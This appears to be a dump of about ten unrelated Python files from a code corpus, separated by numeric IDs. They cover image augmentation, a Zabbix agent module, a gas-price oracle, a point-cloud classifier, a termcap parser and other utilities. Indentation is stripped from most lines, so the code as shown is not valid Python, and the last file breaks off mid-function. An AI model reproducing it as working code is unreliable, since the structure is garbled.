value = np.random.uniform((1/(1+valuelevel)),1+valuelevel)
exposure_imgs.append(_adjusting_exposure(img,value))
batch = np.array(exposure_imgs)
return batch
def apply_filter_batch(batch):
batch = trans2uint(batch)
imgs,_,_,_ = _get_images_from_batches(batch)
filted_img=[]
for img in imgs:
        # np.random.randint upper bound is exclusive, so use 3 to reach the "cold" branch
        option = np.random.randint(3)
        if option == 0:
            filted_img.append(img)
        elif option == 1:
            filted_img.append(_apply_filter(img, "warming"))
        elif option == 2:
            filted_img.append(_apply_filter(img, "cold"))
batch = np.array(filted_img)
return batch
def _adjusting_gamma(image,gamma):
invGamma = 1.0 / gamma
table = np.array([((i / 255.0) ** invGamma) * 255
for i in np.arange(0, 256)]).astype("uint8")
gammaed_image = cv2.LUT(image, table)
#apply gamma correction using the lookup table
return gammaed_image
def _apply_shifting(img,x,y):
rows,cols,chs = img.shape
M = np.float32([[1,0,x],[0,1,y]])
dst = cv2.warpAffine(img,M,(cols,rows))
return dst
def _apply_blur(img,kernellevel):
img_blur = cv2.blur(img,(kernellevel,kernellevel))
return img_blur
def _apply_filter(img_bgr_in,filter):
    img_gray = cv2.cvtColor(img_bgr_in, cv2.COLOR_BGR2GRAY)
anchor_x = [0, 128, 255]
anchor_y = [0, 192, 255]
myLUT = create_LUT_8UC1(anchor_x, anchor_y)
img_curved = cv2.LUT(img_gray, myLUT).astype(np.uint8)
incr_ch_lut = create_LUT_8UC1([0, 64, 128, 192, 256],
[0, 70, 140, 210, 256])
decr_ch_lut = create_LUT_8UC1([0, 64, 128, 192, 256],
[0, 30, 80, 120, 192])
if filter == "warming":
c_b, c_g, c_r = cv2.split(img_bgr_in)
c_r = cv2.LUT(c_r, incr_ch_lut).astype(np.uint8)
c_b = cv2.LUT(c_b, decr_ch_lut).astype(np.uint8)
img_bgr_warm = cv2.merge((c_b, c_g, c_r))
# increase color saturation
c_h, c_s, c_v = cv2.split(cv2.cvtColor(img_bgr_warm,
cv2.COLOR_BGR2HSV))
c_s = cv2.LUT(c_s, incr_ch_lut).astype(np.uint8)
img_bgr_warm = cv2.cvtColor(cv2.merge(
(c_h, c_s, c_v)),
cv2.COLOR_HSV2BGR)
return img_bgr_warm
elif filter == "cold":
c_b, c_g, c_r = cv2.split(img_bgr_in)
c_r = cv2.LUT(c_r, decr_ch_lut).astype(np.uint8)
c_b = cv2.LUT(c_b, incr_ch_lut).astype(np.uint8)
img_bgr_cold = cv2.merge((c_b, c_g, c_r))
# decrease color saturation
c_h, c_s, c_v = cv2.split(cv2.cvtColor(img_bgr_cold,
cv2.COLOR_BGR2HSV))
c_s = cv2.LUT(c_s, decr_ch_lut).astype(np.uint8)
img_bgr_cold = cv2.cvtColor(cv2.merge(
(c_h, c_s, c_v)),
cv2.COLOR_HSV2BGR)
return img_bgr_cold
def _adjusting_saturation(img,value):
hsv = cv2.cvtColor(img,cv2.COLOR_RGB2HSV)
hsv = hsv.astype(np.float64)
hsv[:,:,1] = hsv[:,:,1]*value
hsv[:,:,1] = np.clip(hsv[:,:,1],0.0,255.0)
hsv = hsv.astype(np.uint8)
image = cv2.cvtColor(hsv,cv2.COLOR_HSV2RGB)
return image
def _adjusting_exposure(img,value):
hsv = cv2.cvtColor(img,cv2.COLOR_RGB2HSV)
hsv = hsv.astype(np.float64)
hsv[:,:,2] = hsv[:,:,2]*value
hsv[:,:,2] = np.clip(hsv[:,:,2],0.0,255.0)
hsv = hsv.astype(np.uint8)
image = cv2.cvtColor(hsv,cv2.COLOR_HSV2RGB)
return image
def apply_flip_x(img):
return cv2.flip(img, 0)
def apply_flip_y(img):
return cv2.flip(img, 1)
def apply_flip_xy(img):
return cv2.flip(img, -1)
def apply_resize(img, size):
    linear_img = cv2.resize(img, size, interpolation=cv2.INTER_LINEAR)
    return linear_img
|
413231
|
import typer
from .. import settings
from typing import Optional
# Program
program = typer.Typer()
# Helpers
def version(value: bool):
if value:
typer.echo(settings.VERSION)
raise typer.Exit()
# Command
@program.callback()
def program_main(
version: Optional[bool] = typer.Option(None, "--version", callback=version)
):
"""Livemark is a Python static site generator
that extends Markdown with interactive charts, tables, scripts, and other features.
"""
pass
|
413232
|
import os
import pytest
import numpy as np
import trackintel as ti
from trackintel.visualization.util import a4_figsize
class TestA4_figsize:
"""Tests for a4_figsize() method."""
def test_parameter(self, caplog):
"""Test different parameter configurations."""
fig_width, fig_height = a4_figsize(columns=1)
assert np.allclose([3.30708661, 2.04389193], [fig_width, fig_height])
fig_width, fig_height = a4_figsize(columns=1.5)
assert np.allclose([5.07874015, 3.13883403], [fig_width, fig_height])
fig_width, fig_height = a4_figsize(columns=2)
assert np.allclose([6.85039370, 4.23377614], [fig_width, fig_height])
with pytest.raises(ValueError):
a4_figsize(columns=3)
a4_figsize(fig_height_mm=250)
assert "fig_height too large" in caplog.text
|
413265
|
import image, network, rpc, sensor, struct
import time
import micropython
from pyb import Pin
from pyb import LED
# variables that can be changed
save_to_SD = False
# leds are used as an easy way to know if the remote camera has started fine
red_led = LED(1)
green_led = LED(2)
blue_led = LED(3)
ir_led = LED(4)
def led_control(x):
if (x&1)==0: red_led.off()
elif (x&1)==1: red_led.on()
if (x&2)==0: green_led.off()
elif (x&2)==2: green_led.on()
if (x&4)==0: blue_led.off()
elif (x&4)==4: blue_led.on()
if (x&8)==0: ir_led.off()
elif (x&8)==8: ir_led.on()
processing = True
# pin to trigger the snapshot
pin4 = Pin('P4', Pin.IN, Pin.PULL_UP)
# communication with the controller cam
interface = rpc.rpc_spi_slave(cs_pin="P3", clk_polarity=1, clk_phase=0)
# here we always choose the QQVGA format (160x120) inside a QVGA image
# if this is changed, the camera has to be calibrated again
# also, the logic of mask_height should be checked
img_width = 160
img_height = 120
sensor_format = sensor.RGB565
#additionnal data for the mask height
mask_height = 0
if sensor_format == sensor.RGB565:
mask_height = int(img_height /8)
else:
mask_height = int(img_height / 4)
if mask_height & 1:
mask_height += 1
sensor.reset()
sensor_size = sensor.QVGA
sensor.set_pixformat(sensor_format)
sensor.set_framesize(sensor_size)
# Note that there is a -2 compared to QVGA as there appears to be a slight misalignment when moving from QVGA to QQVGA
# As we use the same remap arrays for both definitions, it is important that both are aligned
sensor.set_windowing((int((sensor.width()-img_width)/2)-2,int((sensor.height()-img_height)/2),img_width,img_height))
#get the gains and exposure
gain_db = sensor.get_gain_db()
exposure_us = sensor.get_exposure_us()
rgb_gain_db = sensor.get_rgb_gain_db()
# Set the gain and exposure to fixed values (we dont care about the values)
sensor.set_auto_gain(False, gain_db)
sensor.set_auto_exposure(False, exposure_us)
sensor.set_auto_whitebal(False, rgb_gain_db)
# Setup contrast, brightness and saturation
sensor.set_contrast(0) # range -3 to +3
sensor.set_brightness(0) # range -3 to +3
sensor.set_saturation(0) # range -3 to +3
# Disable night mode (auto frame rate) and black level calibration (BLC)
sensor.__write_reg(0x0E, 0b00000000) # Disable night mode
sensor.__write_reg(0x3E, 0b00000000) # Disable BLC
sensor.__write_reg(0x13, 0b00000000) # disable automated gain
################################################################
# Call Backs
################################################################
def sensor_config(data):
global processing
sensor_regs= struct.unpack("<16I", data)
reg_list = [0x00, 0x01, 0x02, 0x03, 0x08, 0x10, 0x2d, 0x2e, 0x2f, 0x33, 0x34, 0x35, 0x36, 0x37, 0x37, 0x38]
i = 0
for sr in sensor_regs:
sensor.__write_reg(reg_list[i], sr)
i += 1
gain_db = sensor.get_gain_db()
exposure_us = sensor.get_exposure_us()
rgb_gain_db = sensor.get_rgb_gain_db()
processing = False
return struct.pack("<fIfff",gain_db, exposure_us, rgb_gain_db[0], rgb_gain_db[1], rgb_gain_db[2])
def raw_image_read_cb():
global processing
interface.put_bytes(sensor.get_fb().bytearray(), 5000) # timeout
processing = False
def raw_image_read(data):
interface.schedule_callback(raw_image_read_cb)
return bytes()
def loop_callback():
global processing
if not processing:
raise Exception
# Register call backs.
interface.register_callback(raw_image_read)
interface.register_callback(sensor_config)
interface.setup_loop_callback(loop_callback)
# a simple visual way to know the slave cam has started properly and is ready
# 2 blue blinks
led_control(4)
time.sleep(500)
led_control(0)
time.sleep(500)
led_control(4)
time.sleep(500)
led_control(0)
# configuration step
try:
processing = True
interface.loop()
except:
pass
#stabilisation of the cam
sensor.skip_frames(time=2000)
# save the ref image used for the diff
data_fb = sensor.alloc_extra_fb(img_width, img_height, sensor.RGB565)
ref_img = sensor.alloc_extra_fb(img_width, img_height, sensor_format)
img = sensor.snapshot()
img.remap(data_fb, right=True, upside_down=True)
ref_img.replace(img)
# now add an additional part that will convey the mask info
sensor.set_windowing((int((sensor.width()-img_width)/2)-2,int((sensor.height()-img_height)/2),img_width,img_height+ mask_height))
# serve for ever
while True:
try:
processing = True
while not pin4.value():
pass
# get the image and undistort it
sent_image = sensor.snapshot()
# remove the distortion and apply the stereo calibration
sent_image.remap(data_fb, right=True, upside_down=True)
# diff it with the ref image that has also been undistorted
# (check image_difference_special.py to understand the meaning of the arguments)
sent_image.difference_special(ref_img, data_fb, 25, 40, 100, 200)
interface.loop()
except:
pass
|
413294
|
import numpy as np
import pandas as pd
from ..preprocessing.norm import Normalizer
from ..modeling.model import GruMultiStep
class EthGasPriceOracle:
def __init__(self,
model: GruMultiStep,
training_normalized_dataframe: pd.DataFrame,
scaler: Normalizer,
percentile_value: int = 20):
"""
:param model: GRU model (min gas price target)
:param training_normalized_dataframe: Normalized dataframe used to train the model
:param scaler: Scaler used to train the model
"""
self.model = model
self.scaler = scaler
# Init the min and max slopes from training dataset
predictions = self.model.predict(training_normalized_dataframe, self.scaler,
normalize=False, denormalize=True, use_ground_truth=False)
slopes = self.compute_slopes(predictions)
self.min_slope = min(slopes)
self.max_slope = max(slopes)
print("Slopes fitting done from training set...")
print(f"min slope: {self.min_slope} / max slop: {self.max_slope}")
self.percentile_value = percentile_value
@staticmethod
def compute_slopes(predictions: pd.DataFrame) -> np.ndarray:
predictions = predictions.copy()
t = predictions.shape[1]
slopes = np.empty(len(predictions))
for i in range(len(predictions)):
# We take the first element that is the slope (the second element is the intercept, we drop it)
slope = np.polyfit(np.linspace(0, t, num=t), predictions.iloc[i].values, 1)[0]
slopes[i] = slope
return slopes
def _scale_slope(self, slope):
return (slope - self.min_slope) / (self.max_slope - self.min_slope)
    def _get_coefficient(self, slope):
        scaled_slope = self._scale_slope(slope)
        return np.exp(2 * scaled_slope - 2)
def recommend(self, dataset: pd.DataFrame, urgency: int = 1.0):
predictions = self.model.predict(dataset, self.scaler,
normalize=False, denormalize=True, use_ground_truth=False)
slopes = self.compute_slopes(predictions)
        c = self._get_coefficient(slopes)
g = np.percentile(predictions.values, self.percentile_value, axis=1)
res = g * c * urgency
return pd.DataFrame(res, columns=["gas_price_recommendation"], index=predictions.index)
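# Worked example of the recommendation math (illustrative): the slope of each
# predicted gas-price trajectory is rescaled to [0, 1] using the min/max slopes
# observed on the training set, then mapped through exp(2 * scaled_slope - 2).
# The steepest falling trend (scaled_slope = 0) gives c = exp(-2) ~= 0.135, a
# mid trend (0.5) gives exp(-1) ~= 0.368, and the steepest rising trend (1.0)
# gives exp(0) = 1. The recommendation is then
# percentile(prediction, percentile_value) * c * urgency, so falling prices
# discount the recommended gas price more aggressively.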
|
413341
|
import tensorflow as tf
import numpy as np
import math
import sys
import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.dirname(BASE_DIR)
sys.path.append(BASE_DIR)
sys.path.append(os.path.join(BASE_DIR, '../utils'))
sys.path.append(os.path.join(BASE_DIR, '../../utils'))
sys.path.append(os.path.join(ROOT_DIR, 'tf_ops/sampling'))
import tf_util
from dgcnn_util import get_sampled_edgeconv, get_edgeconv, get_sampled_feature, get_sampled_edgeconv_groupconv, get_edgeconv_groupconv
from tf_sampling import farthest_point_sample, gather_point
def placeholder_inputs(batch_size, num_point):
pointclouds_pl = tf.placeholder(tf.float32, shape=(batch_size, num_point, 3))
labels_pl = tf.placeholder(tf.int32, shape=(batch_size))
return pointclouds_pl, labels_pl
def get_model(point_cloud, is_training, bn_decay=None):
""" Classification PointNet, input is BxNx3, output Bx40 """
batch_size = point_cloud.get_shape()[0].value
num_point = point_cloud.get_shape()[1].value
end_points = {}
k = 20
index = farthest_point_sample(512, point_cloud)
# index = tf.random_uniform([batch_size, 512], minval=0, maxval=num_point-1, dtype=tf.int32)
new_point_cloud_1 = gather_point(point_cloud, index)
net = get_sampled_edgeconv_groupconv(point_cloud, new_point_cloud_1, k, [64, 128],
is_training=is_training, bn_decay=bn_decay, scope='layer1', bn=True)
k = 10
sampled_net, new_point_cloud_2 = get_sampled_feature(new_point_cloud_1, net, 128)
net = get_sampled_edgeconv_groupconv(net, sampled_net, k, [128, 256],
is_training=is_training, bn_decay=bn_decay, scope='layer3', bn=True,
sampled_pc=new_point_cloud_2, pc=new_point_cloud_1)
net = get_edgeconv(net, k, [256], is_training=is_training, bn_decay=bn_decay, scope='layer4', bn=True,
associated=[sampled_net, tf.expand_dims(new_point_cloud_2, axis=-2)])
# net = tf_util.conv2d(net, 256, [1, 1], padding='VALID', stride=[1, 1],
# bn=True, is_training=is_training, scope='layer5', bn_decay=bn_decay)
# net = tf_util.conv2d(net, 512, [1, 1], padding='VALID', stride=[1, 1],
# bn=True, is_training=is_training, scope='layer6', bn_decay=bn_decay)
net = tf_util.conv2d(net, 1024, [1, 1], padding='VALID', stride=[1, 1],
bn=True, is_training=is_training, scope='layer7', bn_decay=bn_decay)
net = tf.reduce_max(net, axis=1, keep_dims=True)
# MLP on global point cloud vector
net = tf.reshape(net, [batch_size, -1])
net = tf_util.fully_connected(net, 512, bn=True, is_training=is_training,
scope='fc1', bn_decay=bn_decay)
net = tf_util.dropout(net, keep_prob=0.5, is_training=is_training,
scope='dp1')
net = tf_util.fully_connected(net, 256, bn=True, is_training=is_training,
scope='fc2', bn_decay=bn_decay)
net = tf_util.dropout(net, keep_prob=0.5, is_training=is_training,
scope='dp2')
net = tf_util.fully_connected(net, 40, activation_fn=None, scope='fc3')
return net, end_points
def get_loss(pred, label, end_points):
""" pred: B*NUM_CLASSES,
label: B, """
labels = tf.one_hot(indices=label, depth=40)
loss = tf.losses.softmax_cross_entropy(onehot_labels=labels, logits=pred, label_smoothing=0.2)
classify_loss = tf.reduce_mean(loss)
return classify_loss
if __name__=='__main__':
batch_size = 2
num_pt = 124
pos_dim = 3
input_feed = np.random.rand(batch_size, num_pt, pos_dim)
label_feed = np.random.rand(batch_size)
label_feed[label_feed>=0.5] = 1
label_feed[label_feed<0.5] = 0
label_feed = label_feed.astype(np.int32)
# # np.save('./debug/input_feed.npy', input_feed)
# input_feed = np.load('./debug/input_feed.npy')
# print(input_feed)
with tf.Graph().as_default():
input_pl, label_pl = placeholder_inputs(batch_size, num_pt)
pos, ftr = get_model(input_pl, tf.constant(True))
# loss = get_loss(logits, label_pl, None)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
feed_dict = {input_pl: input_feed, label_pl: label_feed}
res1, res2 = sess.run([pos, ftr], feed_dict=feed_dict)
print(res1.shape)
print(res1)
print(res2.shape)
print(res2)
|
413345
|
from alvi.client.containers import Array
from alvi.client.scenes.base import Scene
class ArrayCreateNode(Scene):
def run(self, **kwargs):
data_generator = kwargs['data_generator']
array = kwargs['container']
array.init(data_generator.quantity())
for i, value in enumerate(data_generator.values):
array[i] = value
array.sync()
@classmethod
def container_class(cls):
return Array
|
413357
|
def get_cityscapes_palette(num_cls=19):
""" Returns the color map for visualizing the segmentation mask.
Args:
num_cls: Number of classes
Returns:
The color map
"""
palette = [0] * (num_cls * 3)
palette[0:3] = (128, 64, 128) # 0: 'road'
palette[3:6] = (244, 35,232) # 1 'sidewalk'
    palette[6:9] = (70, 70, 70) # 2 'building'
palette[9:12] = (102,102,156) # 3 wall
palette[12:15] = (190,153,153) # 4 fence
palette[15:18] = (153,153,153) # 5 pole
palette[18:21] = (250,170, 30) # 6 'traffic light'
palette[21:24] = (220,220, 0) # 7 'traffic sign'
palette[24:27] = (107,142, 35) # 8 'vegetation'
palette[27:30] = (152,251,152) # 9 'terrain'
palette[30:33] = ( 70,130,180) # 10 sky
palette[33:36] = (220, 20, 60) # 11 person
palette[36:39] = (255, 0, 0) # 12 rider
palette[39:42] = (0, 0, 142) # 13 car
palette[42:45] = (0, 0, 70) # 14 truck
palette[45:48] = (0, 60,100) # 15 bus
palette[48:51] = (0, 80,100) # 16 train
palette[51:54] = (0, 0,230) # 17 'motorcycle'
palette[54:57] = (119, 11, 32) # 18 'bicycle'
palette[57:60] = (105, 105, 105)
return palette
def get_gene_palette(num_cls=182): #Ref: CCNet
""" Returns the color map for visualizing the segmentation mask.
Args:
num_cls: Number of classes
Returns:
The color map
"""
n = num_cls
palette = [0] * (n * 3)
for j in range(0, n):
lab = j
palette[j * 3 + 0] = 0
palette[j * 3 + 1] = 0
palette[j * 3 + 2] = 0
i = 0
while lab:
palette[j * 3 + 0] |= (((lab >> 0) & 1) << (7 - i))
palette[j * 3 + 1] |= (((lab >> 1) & 1) << (7 - i))
palette[j * 3 + 2] |= (((lab >> 2) & 1) << (7 - i))
i += 1
lab >>= 3
return palette
def get_palette(dataset):
if dataset == 'cityscapes':
palette = get_cityscapes_palette(19)
elif dataset == 'pascal_context':
palette = get_gene_palette(num_cls=59)
else:
raise RuntimeError("unkonw dataset :{}".format(dataset))
return palette
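if __name__ == '__main__':
    # Minimal usage sketch (illustrative, assumes Pillow is available): the flat
    # [R, G, B, R, G, B, ...] list returned by get_palette() can be attached to a
    # mode-"P" PIL image whose pixel values are class indices.
    from PIL import Image
    mask = Image.new('P', (4, 4))  # dummy 4x4 class-index image (all zeros = 'road')
    mask.putpalette(get_palette('cityscapes'))
    mask.save('palette_demo.png')  # hypothetical output path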
|
413411
|
import os
import sys
import os.path as path
from tinydb import TinyDB
sys.path.insert(0, path.abspath(path.join(path.dirname(__file__), '..')))
from models import RoadMap
DB_PATH = path.join(path.dirname(__file__), "../../data/data.json")
if __name__ == "__main__":
db = TinyDB(DB_PATH)
entries = db.all()
print(len(entries))
for entry in entries:
name = entry["name"]
print(name)
r, _ = RoadMap.get_or_create(id=entry["id"], defaults={
"name": "",
"map":"",
"description": ""
})
print(name)
r.name = name
r.map_json = entry["map"]
r.save()
|
413462
|
import sys
# attempt to import zabbix runtime if running embedded
try:
import zabbix_runtime
except ImportError:
zabbix_runtime = None
__version__ = "1.0.0"
__python_version_string = "Python %i.%i.%i-%s" % sys.version_info[:4]
__modules = []
__items = []
__routes = {}
zabbix_module_path = "/usr/lib/zabbix/modules/python%i" % sys.version_info[:1]
item_timeout = 0
# log levels from log.h
LOG_LEVEL_CRIT = 1
LOG_LEVEL_ERR = 2
LOG_LEVEL_WARNING = 3
LOG_LEVEL_DEBUG = 4
LOG_LEVEL_TRACE = 5
LOG_LEVEL_INFORMATION = 127
def log(lvl, msg):
if zabbix_runtime:
zabbix_runtime.log(lvl, msg)
elif lvl == LOG_LEVEL_INFORMATION:
print(msg)
elif lvl <= LOG_LEVEL_WARNING:
sys.stderr.write(msg + "\n")
def info(msg):
log(LOG_LEVEL_INFORMATION, msg)
def trace(msg):
log(LOG_LEVEL_TRACE, msg)
def debug(msg):
log(LOG_LEVEL_DEBUG, msg)
def warning(msg):
log(LOG_LEVEL_WARNING, msg)
def error(msg):
log(LOG_LEVEL_ERR, msg)
def critical(msg):
log(LOG_LEVEL_CRIT, msg)
class TimeoutError(Exception):
"""
TimeoutError should be raised by any agent item handler whose execution
exceeds item_timeout seconds
"""
def __str__(self):
return 'Operation timed out'
class AgentRequest(object):
key = None
params = []
def __init__(self, key, params):
self.key = key
self.params = params
def __str__(self):
return "{0}[{1}]".format(self.key, ','.join(self.params))
class AgentItem(object):
key = None
flags = 0
test_param = None
fn = None
def __init__(self, key, flags = 0, fn = None, test_param = None):
if not key:
raise ValueError("key not given in agent item")
if not fn:
raise ValueError("fn not given in agent item")
# join test_param if list or tuple given
if test_param:
try:
for i, v in enumerate(test_param):
test_param[i] = str(v)
test_param = ','.join(test_param)
except TypeError:
test_param = str(test_param)
self.key = key
self.flags = flags
self.test_param = test_param
self.fn = fn
def __str__(self):
return self.key
def route(request):
"""
Route a request from the Zabbix agent to the Python function associated with
the request key.
"""
debug("routing python request: %s" % request)
try:
return __routes[request.key](request)
except KeyError:
raise ValueError("no function registered for agent item " + request.key)
def version(request):
"""Agent item python.version returns the runtime version string"""
return __python_version_string
def macro_name(key):
"""Converts a string into a Zabbix LLD macro"""
from re import sub
macro = key.upper() # uppercase
macro = sub(r'[\s_-]+', '_', macro) # replace whitespace with underscore
macro = sub(r'[^a-zA-Z_]+', '', macro) # strip illegal chars
macro = sub(r'[_]+', '_', macro) # reduce duplicates
macro = ('{#' + macro + '}') # encapsulate in {#}
return macro
def discovery(data):
"""Converts a Python dict into a Zabbix LLD JSON string"""
from json import JSONEncoder
lld_data = { 'data': [] }
for item in data:
lld_item = {}
for key, val in item.items():
if val:
lld_item[macro_name(key)] = str(val)
if lld_item:
lld_data['data'].append(lld_item)
return JSONEncoder().encode(lld_data)
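# Example (illustrative): discovery([{'fs_name': '/var', 'fs_type': 'ext4'}])
# produces a JSON document like
# '{"data": [{"{#FS_NAME}": "/var", "{#FS_TYPE}": "ext4"}]}', i.e. each dict key
# is converted to an LLD macro via macro_name() and each value is stringified.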
def register_item(item):
"""Registers an AgentItem for use in the parent Zabbix process"""
debug("registering item %s" % item.key)
__items.append(item)
__routes[item.key] = item.fn
return item
def register_module_items(mod):
"""
Retrieves a list of AgentItems by calling zbx_module_item_list in the given
module, if it exists. Each item is then registered for use in the parent
Zabbix process.
"""
if isinstance(mod, str):
mod = sys.modules[mod]
debug("calling %s.zbx_module_item_list" % mod.__name__)
try:
newitems = mod.zbx_module_item_list()
try:
for item in newitems:
register_item(item)
except TypeError:
# newitems is probably a single item
register_item(newitems)
except AttributeError:
# module does not define zbx_module_item_list
newitems = []
return newitems
def register_module(mod):
"""
Initializes the given module by calling its zbx_module_init function, if it
exists. Any AgentItems in the module are then registered via
register_module_items.
"""
# import module
debug("registering module: %s" % mod)
if isinstance(mod, str):
mod = __import__(mod)
__modules.append(mod)
# init module
try:
debug("calling %s.zbx_module_init" % mod.__name__)
mod.zbx_module_init()
except AttributeError:
pass
# register items
register_module_items(mod)
return mod
def zbx_module_init():
"""
This function is called by the Zabbix runtime when the module is first loaded.
It initializes and registers builtin AgentItems and all modules from the
configured zabbix_module_path.
"""
import glob
import os.path
# ensure module path is in search path
sys.path.insert(0, zabbix_module_path)
# register builtin items
register_item(AgentItem("python.version", fn = version))
# init list of modules to register
mod_names = []
# register installed packages
for path in glob.glob(zabbix_module_path + "/*/__init__.py"):
mod_name = os.path.basename(os.path.split(path)[0])
if mod_name != __name__:
mod_names.append(mod_name)
register_module(mod_name)
# register installed modules
for path in glob.glob(zabbix_module_path + "/*.py"):
filename = os.path.basename(path)
mod_name = filename[0:len(filename) - 3]
if mod_name != __name__:
mod_names.append(filename)
register_module(mod_name)
# log loaded modules
if mod_names:
info("loaded python modules: %s" % ", ".join(mod_names))
def zbx_module_item_list():
"""
This function is called by the Zabbix runtime and returns all registered
AgentItems for use in the parent Zabbix process.
"""
return __items
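# Illustrative sketch of a user module (assuming this package is importable as
# `zabbix_module` and that "python.echo" is a hypothetical item key). A module
# placed in zabbix_module_path only needs to expose zbx_module_item_list()
# returning AgentItem instances; zbx_module_init() above will discover and
# register it:
#
#     import zabbix_module as zm
#
#     def echo(request):
#         return ','.join(request.params)
#
#     def zbx_module_item_list():
#         return [zm.AgentItem("python.echo", fn=echo, test_param=["hello"])]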
|
413486
|
import logging
import re
import sys
class Cap:
def __init__(self):
self.flags = {}
self.cmds = {}
self.control_data_start_state = ControlDataState()
def parse_cap(cap_str):
cap = Cap()
for field in cap_str.split(':'):
if len(field) == 0:
continue
if field.find('=') > 0:
cap.cmds.update(parse_str_cap(field, cap.control_data_start_state))
elif field.find('#') > 0:
parts = field.split('#')
cap.flags.update({parts[0]:int(parts[1])})
else:
cap.flags.update({field:1})
return cap
class ControlDataParserContext:
def __init__(self):
self.params = []
def push_param(self, param):
self.params.append(param)
class ControlDataState:
def __init__(self):
self.cap_name = {}
self.next_states = {}
self.digit_state = None
def add_state(self, c, state):
if c in self.next_states:
return self.next_states[c]
self.next_states[c] = state
return state
def add_digit_state(self, state):
if self.digit_state:
return self.digit_state
self.digit_state = state
return state
def handle(self, context, c):
if c in self.next_states:
return self.next_states[c]
return self.digit_state.handle(context, c) if self.digit_state else None
def get_cap(self, params):
if len(params) == 0:
return self.cap_name[''] if '' in self.cap_name else None
str_match = ','.join([str(x) for x in params])
if str_match in self.cap_name:
return self.cap_name[str_match]
for k in sorted(self.cap_name, key=lambda v: str(v.count('*')) + v):
if k.find('*') < 0:
if k == str_match:
return self.cap_name[k]
else:
continue
re_str = k.replace(',**','(,[0-9]+)?')
re_str = re_str.replace('**','([0-9]+)?')
re_str = re_str.replace('*', '[0-9]+')
re_str = re_str.replace('?', '*')
if re.match(re_str, str_match):
return self.cap_name[k]
return None
class DigitState(ControlDataState):
def __init__(self):
ControlDataState.__init__(self)
self.digit_base = 10
self.digits = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F']
self.value = None
def handle(self, context, cc):
c = cc.upper()
if c in self.digits[:self.digit_base]:
self.value = self.value * self.digit_base + self.digits.index(c) if self.value else self.digits.index(c)
return self
else:
if self.value is not None:
context.push_param(self.value)
self.value = None
return ControlDataState.handle(self, context, cc)
class CapStringValue:
def __init__(self):
self.padding = 0.0
self.value = ''
self.name = ''
def __str__(self):
return ','.join([self.name, str(self.padding), self.value])
def __repr__(self):
return self.__str__()
def parse_padding(value):
padding = 0.0
pos = 0
if value[0].isdigit():
padding_chars = []
has_dot = False
for pos in range(len(value)):
if value[pos] == '*':
if len(padding_chars) > 0:
padding_chars.append('*')
pos += 1
break
elif value[pos] == '.':
if has_dot:
break
has_dot = True
padding_chars.append('.')
elif value[pos].isdigit():
padding_chars.append(value[pos])
else:
break
#end for
try:
padding = 0.0
if padding_chars[-1] == '*':
padding = float(''.join(padding_chars[:-1]))
else:
padding = float(''.join(padding_chars))
except ValueError:
pass
return (pos, padding)
def build_parser_state_machine(cap_str_value, start_state):
value = cap_str_value.value
pos = 0
cur_state = start_state
repeat_state = None
repeat_char = None
is_repeat_state = False
repeat_enter_state = None
increase_param = False
is_digit_state = False
digit_base = 10
params = []
cap_value = []
while pos <len(value):
c = value[pos]
if c == '\\':
pos += 1
if pos >= len(value):
raise ValueError("Unterminaled str")
c = value[pos]
if c == 'E':
c = chr(0x1B)
elif c == '\\':
c = '\\'
elif c == '(':
is_repeat_state = True
repeat_enter_state = cur_state
pos += 1
continue
elif c == ')':
if not repeat_state or not repeat_char:
raise ValueError("Invalid repeat state:" + str(pos) + "," + value)
cur_state.add_state(repeat_char, repeat_state)
repeat_char = None
repeat_state = None
is_repeat_state = False
pos += 1
continue
elif c.isdigit():
v = 0
while pos < len(value) and c.isdigit():
v = v * 8 + int(c)
pos += 1
if pos < len(value):
c = value[pos]
if not c.isdigit():
pos -= 1
c = chr(v)
else:
raise ValueError("unknown escape string:" + c + "," + str(pos) + "," + value)
elif c == '^':
pos += 1
if pos >= len(value):
raise ValueError("Unterminaled str")
c = chr(ord(value[pos]) - ord('A') + 1)
elif c == '%':
pos += 1
if pos >= len(value):
raise ValueError("Unterminaled str")
c = value[pos]
if c == '%':
c = '%'
elif c == 'i':
increase_param = True
pos += 1
continue
elif c == 'd':
is_digit_state = True
digit_base = 10
elif c == 'X' or c == 'x':
is_digit_state = True
digit_base = 16
else:
raise ValueError('unknown format string:' + c + "," + str(pos) + "," + value)
elif c.isdigit():
v = 0
while pos < len(value) and c.isdigit():
v = v * 10 + int(c)
pos += 1
if pos < len(value):
c = value[pos]
if not c.isdigit():
#restore the last digit
pos -= 1
#include all digit char into cap_value
c = str(v)
#save the params
params.append(str(v))
#build state with c
if is_digit_state:
cur_state = cur_state.add_digit_state(DigitState())
cur_state.digit_base = digit_base
#save the params
if is_repeat_state:
params.append('**')
else:
params.append('*')
elif c.isdigit():
cur_state = cur_state.add_digit_state(DigitState())
cap_value.append(c)
else:
cur_state = cur_state.add_state(c, ControlDataState())
cap_value.append(c)
if is_repeat_state and not repeat_state:
repeat_state = cur_state
repeat_char = c
if not is_repeat_state and repeat_enter_state:
old_cur_state = cur_state
cur_state = repeat_enter_state.add_state(c, cur_state)
if cur_state != old_cur_state:
#merge the state
logging.error('should put generic pattern before special pattern')
sys.exit(1)
repeat_enter_state = None
is_digit_state = False
pos += 1
return (cur_state, params, increase_param, ''.join(cap_value))
def parse_str_cap(field, start_state):
cap_str_value = CapStringValue()
parts = field.split('=')
cap_str_value.name = parts[0]
value = cap_str_value.value = '='.join(parts[1:])
#padding
pos, cap_str_value.padding = parse_padding(value)
#build the parser state machine
value = cap_str_value.value = value[pos:]
cap_state, params, increase_param, cap_str_value.cap_value = build_parser_state_machine(cap_str_value, start_state)
cap_name_key = ','.join(params)
if cap_name_key in cap_state.cap_name:
e_name, e_inc_param = cap_state.cap_name[cap_name_key]
if (e_name != cap_str_value.name) or (e_inc_param != increase_param):
raise ValueError('same parameter for different cap name:[' + cap_name_key + '],' + cap_str_value.name)
cap_state.cap_name[cap_name_key] = (cap_str_value.name, increase_param)
return {parts[0]:cap_str_value}
if __name__ == '__main__':
import read_termdata
cap_str = read_termdata.get_entry(sys.argv[1], 'xterm-256color')
cap1 = cap = parse_cap(cap_str)
print cap.flags, cap.cmds
cap = parse_cap(":cm=1.3*\E")
print cap.flags, cap.cmds
cap = parse_cap(":cm=1a.a.3*\E")
print cap.flags, cap.cmds
context = ControlDataParserContext()
state = cap1.control_data_start_state
next_state = None
def try_parse(v):
